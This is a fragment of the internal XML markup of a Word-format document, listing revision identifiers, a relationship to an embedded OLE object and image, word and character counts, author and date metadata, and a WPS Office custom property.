    <w:rsid w:val="787926A8"/>
    <w:rsid w:val="787E4304"/>
    <w:rsid w:val="788063D1"/>
    <w:rsid w:val="78861C41"/>
    <w:rsid w:val="78E24C9B"/>
    <w:rsid w:val="790C7B25"/>
    <w:rsid w:val="79A40B9A"/>
    <w:rsid w:val="79A52828"/>
    <w:rsid w:val="79ED4FBA"/>
    <w:rsid w:val="7A245A70"/>
    <w:rsid w:val="7ADA7998"/>
    <w:rsid w:val="7AE446F6"/>
    <w:rsid w:val="7AEA791F"/>
    <w:rsid w:val="7B2524AF"/>
    <w:rsid w:val="7B257DAB"/>
    <w:rsid w:val="7B4E6B2E"/>
    <w:rsid w:val="7B644801"/>
    <w:rsid w:val="7B6F730F"/>
    <w:rsid w:val="7BA27F87"/>
    <w:rsid w:val="7C560916"/>
    <w:rsid w:val="7C6B7492"/>
    <w:rsid w:val="7C7236B9"/>
    <w:rsid w:val="7C740E42"/>
    <w:rsid w:val="7C793044"/>
    <w:rsid w:val="7C8B78A5"/>
    <w:rsid w:val="7D0719AF"/>
    <w:rsid w:val="7DA32FF7"/>
    <w:rsid w:val="7DCE3976"/>
    <w:rsid w:val="7DF97179"/>
    <w:rsid w:val="7E062BD5"/>
    <w:rsid w:val="7E4454AB"/>
    <w:rsid w:val="7E673DFD"/>
    <w:rsid w:val="7E6968BA"/>
    <w:rsid w:val="7E755EA0"/>
    <w:rsid w:val="7EC93B31"/>
    <w:rsid w:val="7EED29D8"/>
    <w:rsid w:val="7F216FC3"/>
    <w:rsid w:val="7F24473A"/>
    <w:rsid w:val="7F761B63"/>
    <w:rsid w:val="7F8204DC"/>
    <w:rsid w:val="7FA55D66"/>
    <w:rsid w:val="7FD0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0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emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin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47</Words>
  <Characters>629</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>634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2021-10-25T01:33:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Dog~</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-16T01:50:31Z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6BA8D3C5708E4C77814EC2C43AB25087_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNWM1MWJkNWJiY2Q1NzJmZmRlMThjOTUwZWMxNmFkZjkiLCJ1c2VySWQiOiI5MTk5NDE2ODYifQ==</vt:lpwstr>
  </property>
</Properties>
</file>